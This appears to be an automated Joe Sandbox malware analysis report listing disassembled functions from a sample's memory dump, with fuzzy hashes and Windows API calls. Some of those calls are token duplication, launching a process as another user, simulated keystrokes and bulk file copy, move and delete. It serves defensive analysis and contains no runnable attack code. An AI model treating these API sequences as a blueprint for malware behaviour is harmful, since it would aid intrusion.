Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9

Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
• Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
• Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
• Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E

Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
• Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
• Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
• Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95

APIs
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: __lock_file
• String ID:
• API String ID: 3031932315-0
• Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
• Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
• Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
• Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9

APIs
• WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
• Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
• Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
• Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4

APIs
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
• Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
• Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
• Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
• Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689

APIs
• CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
• Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
• Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
• Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50

APIs
• Sleep.KERNELBASE(000001F4), ref: 040D32B9
Memory Dump Source
• Source File: 00000000.00000002.2152227056.00000000040D1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040D1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40d1000_jpdy1E8K4A.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction ID: dd150269edc9e6657b406a42fcb9476284f126cc57e924a6364e4514ba75213d
• Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction Fuzzy Hash: C6E0E67494020DDFDB00DFB4D5496AD7BB4EF04301F100561FD01E2280DA309D508A62

APIs
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
• DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
• GetKeyState.USER32(00000011), ref: 0047C92D
• GetKeyState.USER32(00000009), ref: 0047C936
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
• GetKeyState.USER32(00000010), ref: 0047C953
• GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
• SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
• SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
• _wcsncpy.LIBCMT ref: 0047CA29
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
• SendMessageW.USER32 ref: 0047CA7F
• InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
• SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
• ImageList_SetDragCursorImage.COMCTL32(0099F230,00000000,00000000,00000000), ref: 0047CB9B
• ImageList_BeginDrag.COMCTL32(0099F230,00000000,000000F8,000000F0), ref: 0047CBAC
• SetCapture.USER32(?), ref: 0047CBB6
• ClientToScreen.USER32(?,?), ref: 0047CC17
• ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
• ReleaseCapture.USER32 ref: 0047CC3A
• GetCursorPos.USER32(?), ref: 0047CC72
• ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                • SendMessageW.USER32 ref: 0047CD12
                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                • SendMessageW.USER32 ref: 0047CD80
                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                • SendMessageW.USER32 ref: 0047CE93
                                                                                                • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,00951BD8,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                • SendMessageW.USER32 ref: 0047CF6B
                                                                                                • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,00951BD8,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                • API String ID: 3100379633-4164748364
                                                                                                • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 00434420
                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                • IsIconic.USER32(?), ref: 0043444F
                                                                                                • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                • String ID: Shell_TrayWnd
                                                                                                • API String ID: 2889586943-2988720461
                                                                                                • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                APIs
                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                • _wcslen.LIBCMT ref: 00446498
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                • String ID: $@OH$default$winsta0
                                                                                                • API String ID: 3324942560-3791954436
                                                                                                • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                APIs
                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                                                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                                                  • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                • _wcscat.LIBCMT ref: 0044BD94
                                                                                                • _wcscat.LIBCMT ref: 0044BDBD
                                                                                                • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                                • _wcscpy.LIBCMT ref: 0044BE71
                                                                                                • _wcscat.LIBCMT ref: 0044BE83
                                                                                                • _wcscat.LIBCMT ref: 0044BE95
                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                • String ID: \*.*
                                                                                                • API String ID: 2188072990-1173974218
                                                                                                • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                                • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                • __swprintf.LIBCMT ref: 004789D3
                                                                                                • __swprintf.LIBCMT ref: 00478A1D
                                                                                                • __swprintf.LIBCMT ref: 00478A4B
                                                                                                • __swprintf.LIBCMT ref: 00478A79
                                                                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                • __swprintf.LIBCMT ref: 00478AA7
                                                                                                • __swprintf.LIBCMT ref: 00478AD5
                                                                                                • __swprintf.LIBCMT ref: 00478B03
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                • API String ID: 999945258-2428617273
                                                                                                • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                • __wsplitpath.LIBCMT ref: 00403492
                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                • _wcscpy.LIBCMT ref: 004034A7
                                                                                                • _wcscat.LIBCMT ref: 004034BC
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                • _wcscpy.LIBCMT ref: 004035A0
                                                                                                • _wcslen.LIBCMT ref: 00403623
                                                                                                • _wcslen.LIBCMT ref: 0040367D
                                                                                                Strings
                                                                                                • Unterminated string, xrefs: 00428348
                                                                                                • _, xrefs: 0040371C
                                                                                                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                • Error opening the file, xrefs: 00428231
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
